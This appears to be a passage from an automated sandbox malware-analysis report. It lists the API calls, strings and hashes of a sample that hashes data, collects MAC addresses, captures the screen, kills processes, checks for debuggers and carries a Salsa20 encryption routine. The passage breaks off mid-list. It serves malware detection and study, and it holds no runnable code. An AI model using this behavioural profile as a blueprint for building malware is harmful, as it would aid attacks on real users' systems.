                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 1084002244-213608013
                                                                                                  • Opcode ID: 50d24f834ed2ab91c2d6e3bfdee5ccbf7c463880f801813b6fecc7bffc36e9f6
                                                                                                  • Instruction ID: 0f364c2be3997c3a348351669ed10480bf55795f38024e0563c1b43729509764
                                                                                                  • Opcode Fuzzy Hash: 50d24f834ed2ab91c2d6e3bfdee5ccbf7c463880f801813b6fecc7bffc36e9f6
                                                                                                  • Instruction Fuzzy Hash: 1151B2B1D40209ABDF10DFA1DC46FEFBB78EB18708F10452AF605B6281D7796A059BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0056FCA4,00000000), ref: 0047EB01
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047EB17
                                                                                                    • Part of subcall function 004A0ECA: RaiseException.KERNEL32(?,?,?,<yW,?,?,?,?,?,00493B9C,?,0057793C,?,00000001), ref: 004A0F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0047EB2C
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047EB42
                                                                                                  • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0047EB4E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047EB64
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0047EB83
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047EB95
                                                                                                  • _memset.LIBCMT ref: 0047EBB4
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0047EBC8
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047EBDA
                                                                                                  • _sprintf.LIBCMT ref: 0047EBF4
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 0047EC44
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0047EC4F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 1637485200-213608013
                                                                                                  • Opcode ID: 904e565fc6721eb5ed7332861c18610c000b55f714c5314c4db2ff199ae403e3
                                                                                                  • Instruction ID: ebcc47b6e14f071e5ea758fd9fe39f53cf53377f2093b69f1edba95c92539f97
                                                                                                  • Opcode Fuzzy Hash: 904e565fc6721eb5ed7332861c18610c000b55f714c5314c4db2ff199ae403e3
                                                                                                  • Instruction Fuzzy Hash: F451A371D40209ABDF11DBA1DD46FEFBFB8FB18708F10412AF905B6280D7796A059BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 004C49A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,004C4B72), ref: 004C49C7
                                                                                                    • Part of subcall function 004C49A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004C49D7
                                                                                                    • Part of subcall function 004C49A0: GetDesktopWindow.USER32 ref: 004C49FB
                                                                                                    • Part of subcall function 004C49A0: GetProcessWindowStation.USER32(?,004C4B72), ref: 004C4A01
                                                                                                    • Part of subcall function 004C49A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,004C4B72), ref: 004C4A1C
                                                                                                    • Part of subcall function 004C49A0: GetLastError.KERNEL32(?,004C4B72), ref: 004C4A2A
                                                                                                    • Part of subcall function 004C49A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,004C4B72), ref: 004C4A65
                                                                                                    • Part of subcall function 004C49A0: _wcsstr.LIBCMT ref: 004C4A8A
                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004F2316
                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 004F2323
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 004F2338
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004F2341
                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 004F234E
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004F235C
                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004F236E
                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004F23CA
                                                                                                  • GetBitmapBits.GDI32(?,?,00000000), ref: 004F23D6
                                                                                                  • SelectObject.GDI32(?,?), ref: 004F2436
                                                                                                  • DeleteObject.GDI32(00000000), ref: 004F243D
                                                                                                  • DeleteDC.GDI32(?), ref: 004F244A
                                                                                                  • DeleteDC.GDI32(?), ref: 004F2450
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                  • API String ID: 151064509-1805842116
                                                                                                  • Opcode ID: 8bc30d02156012b2acc0b9af3cdf58bc43077480201f9a9bb4d4561b07eb7c4e
                                                                                                  • Instruction ID: 12ab5f856871c3ed5830ad4687704b835afccae24cf3e0762a85c2e461c89772
                                                                                                  • Opcode Fuzzy Hash: 8bc30d02156012b2acc0b9af3cdf58bc43077480201f9a9bb4d4561b07eb7c4e
                                                                                                  • Instruction Fuzzy Hash: 6841C371904340ABD3109BB59C4AF2FBFF8FF99714F00051EFA54E62A1E7B598049BA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0047E67F
                                                                                                    • Part of subcall function 00490C62: __FF_MSGBANNER.LIBCMT ref: 00490C79
                                                                                                    • Part of subcall function 00490C62: __NMSG_WRITE.LIBCMT ref: 00490C80
                                                                                                    • Part of subcall function 00490C62: RtlAllocateHeap.NTDLL(00890000,00000000,00000001,?,?,?,?,00493B69,?), ref: 00490CA5
                                                                                                  • _malloc.LIBCMT ref: 0047E68B
                                                                                                  • _wprintf.LIBCMT ref: 0047E69E
                                                                                                  • _free.LIBCMT ref: 0047E6A4
                                                                                                    • Part of subcall function 00490BED: HeapFree.KERNEL32(00000000,00000000,?,0049507F,00000000,0049520D,00490CE9), ref: 00490C01
                                                                                                    • Part of subcall function 00490BED: GetLastError.KERNEL32(00000000,?,0049507F,00000000,0049520D,00490CE9), ref: 00490C13
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0047E6B9
                                                                                                  • _free.LIBCMT ref: 0047E6C5
                                                                                                  • _malloc.LIBCMT ref: 0047E6CD
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0047E6E0
                                                                                                  • _sprintf.LIBCMT ref: 0047E720
                                                                                                  • _wprintf.LIBCMT ref: 0047E732
                                                                                                  • _wprintf.LIBCMT ref: 0047E73C
                                                                                                  • _free.LIBCMT ref: 0047E745
                                                                                                  Strings
                                                                                                  • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0047E699
                                                                                                  • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0047E71A
                                                                                                  • Address: %s, mac: %s, xrefs: 0047E72D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                  • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                  • API String ID: 3901070236-1604013687
                                                                                                  • Opcode ID: d4a65dc68d9c5e339e69ab5922b3239c977b82e589182e7d7c099afae2c183ae
                                                                                                  • Instruction ID: 8790309dbe6c97c09d4c8bd8096284a73353742ced7b4e78400cfe2deb2ac12a
                                                                                                  • Opcode Fuzzy Hash: d4a65dc68d9c5e339e69ab5922b3239c977b82e589182e7d7c099afae2c183ae
                                                                                                  • Instruction Fuzzy Hash: 371136B29005647ECA61A3B65C06EFF3EDC8F4A715F0401BFFA8CE5241E65C5A00A3B9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00481AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00481ACA
                                                                                                    • Part of subcall function 00481AB0: DispatchMessageW.USER32(?), ref: 00481AE0
                                                                                                    • Part of subcall function 00481AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00481AEE
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00480346
                                                                                                  • _memmove.LIBCMT ref: 00480427
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0048048E
                                                                                                  • _memmove.LIBCMT ref: 00480514
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                  • String ID:
                                                                                                  • API String ID: 273148273-0
                                                                                                  • Opcode ID: d73f6b653c0670e73dbcf58a65498a0b0b73e27b2875dfadd37cbda18f8b017f
                                                                                                  • Instruction ID: 834c1f311149f7c0c6bbbe6cf83a285cb277c791a0af9483950e452bf2f97999
                                                                                                  • Opcode Fuzzy Hash: d73f6b653c0670e73dbcf58a65498a0b0b73e27b2875dfadd37cbda18f8b017f
                                                                                                  • Instruction Fuzzy Hash: B742B170D10208DBDF54EFA4C945BDEBBF4BF04308F20496EE405A7251E779AA49CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3232302685-0
                                                                                                  • Opcode ID: 375924a877d18ebe6560f9693be818e690f391c4d76f0137b136ad4e1dbd8b8b
                                                                                                  • Instruction ID: 36018d5b860116067624692eb221e645cc720771dc3539ef3ee91b91b69551a0
                                                                                                  • Opcode Fuzzy Hash: 375924a877d18ebe6560f9693be818e690f391c4d76f0137b136ad4e1dbd8b8b
                                                                                                  • Instruction Fuzzy Hash: 79B19D70D00208DBDF20EFA4DC45BDEBBB5BF15308F10846AE40AAB251E7799A49CF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0048244F
                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00482469
                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004824A1
                                                                                                  • TerminateProcess.KERNEL32(00000000,00000009), ref: 004824B0
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004824B7
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 004824C1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004824CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                  • String ID: cmd.exe
                                                                                                  • API String ID: 2696918072-723907552
                                                                                                  • Opcode ID: d3d0509c50b480699e32eaa229b12f61432ad56c78af8231fd2734435291788d
                                                                                                  • Instruction ID: 8370eb462a55c074489008210c8bf6d0eb79ee79c226003cd31ed175aafb09f0
                                                                                                  • Opcode Fuzzy Hash: d3d0509c50b480699e32eaa229b12f61432ad56c78af8231fd2734435291788d
                                                                                                  • Instruction Fuzzy Hash: 5901B5365012157BE7206BA0AC8DFAF7B6CEB08B14F000061FD08E2241E7B88944ABB5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _wcscmp.LIBCMT ref: 004A82B9
                                                                                                  • _wcscmp.LIBCMT ref: 004A82CA
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,004A8568,?,00000000), ref: 004A82E6
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,004A8568,?,00000000), ref: 004A8310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale_wcscmp
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 1351282208-711371036
                                                                                                  • Opcode ID: 8a91af66d975871898e70baf55a3da122411d1819bc29f59aa3d5fa3f280c36f
                                                                                                  • Instruction ID: e7a501c06d6f38411e8e12a5007fd6cb15119fc5e82e8b5a1776d55951a4fedb
                                                                                                  • Opcode Fuzzy Hash: 8a91af66d975871898e70baf55a3da122411d1819bc29f59aa3d5fa3f280c36f
                                                                                                  • Instruction Fuzzy Hash: 4001C432205515AADB205E58DC05FE63B98EF26B54F00805BF904DA192EF74DE50D7CC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                                                                                                  • API String ID: 0-1714976780
                                                                                                  • Opcode ID: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                  • Instruction ID: 1950b93872da02f6edaed901ce6e2f2416b41d53cb89d9b00089ae1962ced995
                                                                                                  • Opcode Fuzzy Hash: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                  • Instruction Fuzzy Hash: 8E314927A114960AFB78587C88553FD2583D395370F7AC73BD22EC7AE4D86D8D811158
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0047C090
                                                                                                  • input != nullptr && output != nullptr, xrefs: 0047C095
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wassert
                                                                                                  • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                  • API String ID: 3993402318-1975116136
                                                                                                  • Opcode ID: a1e6955c3bac63fd2a5521ecba37a32b655c7dce2b4e34ee3b9decedd0e75dc4
                                                                                                  • Instruction ID: 2e0ed54e858e52a34cda404f7995165094f4c215b2e0130fdb349a22dc71c49f
                                                                                                  • Opcode Fuzzy Hash: a1e6955c3bac63fd2a5521ecba37a32b655c7dce2b4e34ee3b9decedd0e75dc4
                                                                                                  • Instruction Fuzzy Hash: C1C18BB5E002499FCB54CFA9C885ADEFBF1FF48304F24856AE919E7301E334AA558B54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0049419D
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00494252
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DebuggerPresent_memset
                                                                                                  • String ID: i;I
                                                                                                  • API String ID: 2328436684-2348105649
                                                                                                  • Opcode ID: 344d32c59163613412fbf2c43c7043375a7d1d5bcec686a986c72c3e021147de
                                                                                                  • Instruction ID: bb39bb52d651371a50664c74660110964cd9497365252dd04a2e4cd6c9cde1ac
                                                                                                  • Opcode Fuzzy Hash: 344d32c59163613412fbf2c43c7043375a7d1d5bcec686a986c72c3e021147de
                                                                                                  • Instruction Fuzzy Hash: 9E31D77491122C9BCF21DF68D9897C9BBB8BF58310F1042EAE80CA6251E7349F858F49
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptDestroyHash.ADVAPI32(?), ref: 00481190
                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004811A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
